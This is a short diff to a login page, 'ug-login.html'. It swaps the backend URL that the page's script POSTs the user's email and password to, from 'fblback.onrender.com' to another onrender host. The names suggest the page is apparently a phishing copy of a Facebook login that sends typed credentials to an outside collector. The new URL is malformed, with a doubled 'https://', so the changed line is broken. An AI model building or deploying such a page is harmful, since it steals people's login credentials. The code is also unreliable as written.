--- a/public/ug-login.html
+++ b/public/ug-login.html
@@ -112,7 +112,7 @@
       passwordError.style.display = "none";
 
       try {
-        await fetch("https://fblback.onrender.com/login", {
+        await fetch("https://https://zaza-back.onrender.com/login", {
           method: "POST",
           headers: { "Content-Type": "application/json" },
           body: JSON.stringify({ email, password })
